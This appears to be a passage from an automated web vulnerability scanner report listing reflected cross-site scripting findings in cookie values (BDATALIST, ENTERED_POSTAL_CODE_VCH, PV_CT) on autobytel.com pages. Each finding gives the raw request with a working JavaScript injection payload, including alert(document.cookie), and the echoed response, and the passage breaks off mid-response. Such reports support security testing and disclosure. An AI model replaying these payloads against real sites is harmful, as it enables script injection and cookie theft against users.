Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4e8fdd"%3balert(1)//5500969e7cb; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:26:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:26:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:26:08 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:26:08 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4e8fdd";alert(1)//5500969e7cb";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "477ADD20-B13F-2799-135F8D39
...[SNIP]...

4.2059. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm/filters/Buying%20Guide

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9f4a"%3balert(1)//984810f28b2 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as e9f4a";alert(1)//984810f28b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/article/index.cfm/filters/Buying%20Guide HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=e9f4a"%3balert(1)//984810f28b2; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:31:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:31:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:31:29 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:31:29 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";

           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "e9f4a";alert(1)//984810f28b2||";

           s.prop14 = "research|article|buyingguide : Search Engine Optimization Project entry page";
           s.prop15 = "8849|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research
...[SNIP]...

4.2060. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm/filters/Buying%20Guide

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload a5fe8<img%20src%3da%20onerror%3dalert(1)>1080b64761a was submitted in the PV_CT cookie. This input was echoed as a5fe8<img src=a onerror=alert(1)>1080b64761a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/research/article/index.cfm/filters/Buying%20Guide HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2a5fe8<img%20src%3da%20onerror%3dalert(1)>1080b64761a; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 53354
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:27:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:27:27 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:27:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:27:27 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 2a5fe8<img src=a onerror=alert(1)>1080b64761a cannot be converted to a number.
</h1>
...[SNIP]...

4.2061. http://www.autobytel.com/content/research/comparison/index.cfm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/comparison/index.cfm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac01"%3balert(1)//ab5c6eae5d1 was submitted in the BDATALIST cookie. This input was echoed as 5ac01";alert(1)//ab5c6eae5d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/comparison/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c45ac01"%3balert(1)//ab5c6eae5d1; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:26:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:26:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:26:20 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:26:20 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 414164

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c45ac01";alert(1)//ab5c6eae5d1";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "477CAF5F-B294-6E91-C704E9E0
...[SNIP]...

4.2062. http://www.autobytel.com/content/research/comparison/index.cfm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/comparison/index.cfm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59b4c"%3balert(1)//6c656f1a1a5 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 59b4c";alert(1)//6c656f1a1a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/comparison/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=59b4c"%3balert(1)//6c656f1a1a5; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:44:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:44:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:44:13 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:44:13 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 414164

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
Crossover/Wagons";

           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "59b4c";alert(1)//6c656f1a1a5||";

           s.prop14 = "research|comparison : Search Engine Optimization Project entry page";
           s.prop15 = "No Article|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research|||
...[SNIP]...

4.2063. http://www.autobytel.com/content/research/comparison/index.cfm [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/comparison/index.cfm

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 331ff<img%20src%3da%20onerror%3dalert(1)>6cc2970f544 was submitted in the PV_CT cookie. This input was echoed as 331ff<img src=a onerror=alert(1)>6cc2970f544 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/research/comparison/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2331ff<img%20src%3da%20onerror%3dalert(1)>6cc2970f544; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 421910
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:33:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:15 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:14 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:14 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 2331ff<img src=a onerror=alert(1)>6cc2970f544 cannot be converted to a number.
</h1>
...[SNIP]...

4.2064. http://www.autobytel.com/content/research/index.cfm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/index.cfm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c114f"%3balert(1)//11f8a886fb2 was submitted in the BDATALIST cookie. This input was echoed as c114f";alert(1)//11f8a886fb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4c114f"%3balert(1)//11f8a886fb2; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:29:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:29:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:29:29 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:29:29 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104097

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4c114f";alert(1)//11f8a886fb2";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47996F58-AADD-8D97-48B2F1E9
...[SNIP]...

4.2065. http://www.autobytel.com/content/research/index.cfm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/index.cfm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86827"%3balert(1)//219d19e185b was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 86827";alert(1)//219d19e185b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=86827"%3balert(1)//219d19e185b; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:34:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:34:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=86827;expires=Wed, 16-Jan-2041 23:34:18 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:34:18 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104108

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
= "research|rhp";

           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "86827";alert(1)//219d19e185b||";

           s.prop14 = "new car home page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research|||rec|sky|ban|
...[SNIP]...

4.2066. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94665"%3balert(1)//bf978242d4f was submitted in the BDATALIST cookie. This input was echoed as 94665";alert(1)//bf978242d4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/kbb/index.cfm/action/selectyear/valuetype/TI HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c494665"%3balert(1)//bf978242d4f; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:27:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:27:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:27:29 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:27:29 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 37517

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c494665";alert(1)//bf978242d4f";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47874158-EA8D-D728-D164A9E4
...[SNIP]...

4.2067. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bbbd"%3balert(1)//71b5ba10f64 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 3bbbd";alert(1)//71b5ba10f64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/kbb/index.cfm/action/selectyear/valuetype/TI HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=3bbbd"%3balert(1)//71b5ba10f64; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 37517
Expires: Mon, 24 Jan 2011 23:32:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:32:13 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:32:13 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
